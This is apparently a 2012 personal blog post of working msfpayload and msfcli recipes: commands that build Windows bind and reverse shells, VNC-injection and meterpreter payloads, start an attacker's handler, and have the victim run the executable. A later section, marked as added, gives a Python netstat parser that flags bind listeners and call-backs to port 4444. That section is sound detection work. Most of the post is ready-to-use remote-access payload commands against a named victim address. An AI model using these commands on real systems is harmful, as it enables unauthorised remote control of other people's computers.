Posted 2012.07.21

Metasploit Payloads - msfpayload


This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as I get more working examples.


These payloads will be detected by AV, I will cover methods of avoiding AV detection in another post.


In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.




1. For a listening shell on the target


Create payload:

./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe


Target:

run Listen-shell.exe


Hacker:

nc 192.168.1.110 2482




2. For a reverse shell on the target


Create payload:

./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E


Target:

run reverse-shell.exe




3. For a VNC listener on target


Create payload:

./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe


Target:

run Listen-vnc.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E 




4. For a reverse VNC session


Create payload:

./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E


Target:

run reverse-vnc.exe




5. For a meterpreter listener


Create payload:

./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe


Target:

run met-listen.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E




6. For a reverse meterpreter connection (not working yet; not sure why)


Create payload:

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 X > /tmp/met-reverse.exe


Hacker:

./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E


Target:

run met-reverse.exe



UPDATE: The payload for 6 should read:


./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 LPORT=4444 X > /tmp/met-reverse.exe
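Every payload in these notes leaves the same kind of footprint in the target's socket table: a bind payload (shell_bind_tcp, vncinject/bind_tcp, meterpreter/bind_tcp) opens a listener on LPORT, and a reverse payload (reverse_tcp variants) makes an outbound connection to LHOST:LPORT, port 4444 when no LPORT is given. The Python below is an added example, not from the original post or from the Metasploit project: it parses constructed `netstat -ano`-style lines and flags a listener outside a known baseline and an established connection to the default handler port. The baseline port set, the sample lines and the PIDs are assumptions made for the example.

```python
"""Flag bind-style listeners and reverse-style call-backs in netstat-like output.

Added example for the msfpayload notes; the sample socket table is constructed
and the listening-port baseline is an assumption, not a site-specific value.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Set

# Constructed sample modelled on `netstat -ano` layout; not captured from a real host.
# Line 3 mirrors the bind examples (LPORT=2482), line 4 the reverse examples
# (victim 192.168.1.110 calling attacker 192.168.1.112 on the default port 4444).
SAMPLE_NETSTAT = """\
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       880
  TCP    0.0.0.0:2482           0.0.0.0:0              LISTENING       3120
  TCP    192.168.1.110:49712    192.168.1.112:4444     ESTABLISHED     3204
  TCP    192.168.1.110:49720    10.0.0.5:443           ESTABLISHED     2140
"""

# Assumption: ports this host is expected to listen on (RPC, NetBIOS, SMB, RDP).
EXPECTED_LISTEN_PORTS: Set[int] = {135, 139, 445, 3389}
# Default msfpayload/handler port from the notes above.
HANDLER_PORTS: Set[int] = {4444}

# TCP rows only: `netstat -ano` prints no State column for UDP.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<faddr>\S+):(?P<fport>\d+|\*)\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$"
)


@dataclass(frozen=True)
class Finding:
    kind: str      # "unexpected_listener" or "suspicious_callback"
    local: str     # local address:port
    foreign: str   # foreign address:port
    pid: int


def parse_netstat(text: str) -> List[Dict]:
    """Turn netstat-style lines into dicts; header and non-TCP lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        fport = m.group("fport")
        rows.append({
            "laddr": m.group("laddr"),
            "lport": int(m.group("lport")),
            "faddr": m.group("faddr"),
            "fport": None if fport == "*" else int(fport),
            "state": m.group("state"),
            "pid": int(m.group("pid")),
        })
    return rows


def find_suspicious(text: str,
                    expected_listen: Set[int] = EXPECTED_LISTEN_PORTS,
                    handler_ports: Set[int] = HANDLER_PORTS) -> List[Finding]:
    """Return one Finding per row matching a bind-listener or reverse-callback pattern."""
    findings: List[Finding] = []
    for r in parse_netstat(text):
        local = f"{r['laddr']}:{r['lport']}"
        foreign = f"{r['faddr']}:{r['fport'] if r['fport'] is not None else '*'}"
        # Bind payload: a new process listening on a port outside the baseline.
        if r["state"] == "LISTENING" and r["lport"] not in expected_listen:
            findings.append(Finding("unexpected_listener", local, foreign, r["pid"]))
        # Reverse payload: an established connection to a known handler port.
        elif r["state"] == "ESTABLISHED" and r["fport"] in handler_ports:
            findings.append(Finding("suspicious_callback", local, foreign, r["pid"]))
    return findings


if __name__ == "__main__":
    for f in find_suspicious(SAMPLE_NETSTAT):
        print(f"{f.kind:20} local={f.local:22} foreign={f.foreign:22} pid={f.pid}")
```

The listener check depends entirely on the baseline being accurate for the host, and the call-back check only catches the default port; a handler on any other LPORT (2482 in the VNC examples) would need the port added to `HANDLER_PORTS` or a broader rule, such as any outbound connection from a process that does not normally open sockets.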




Posted by extr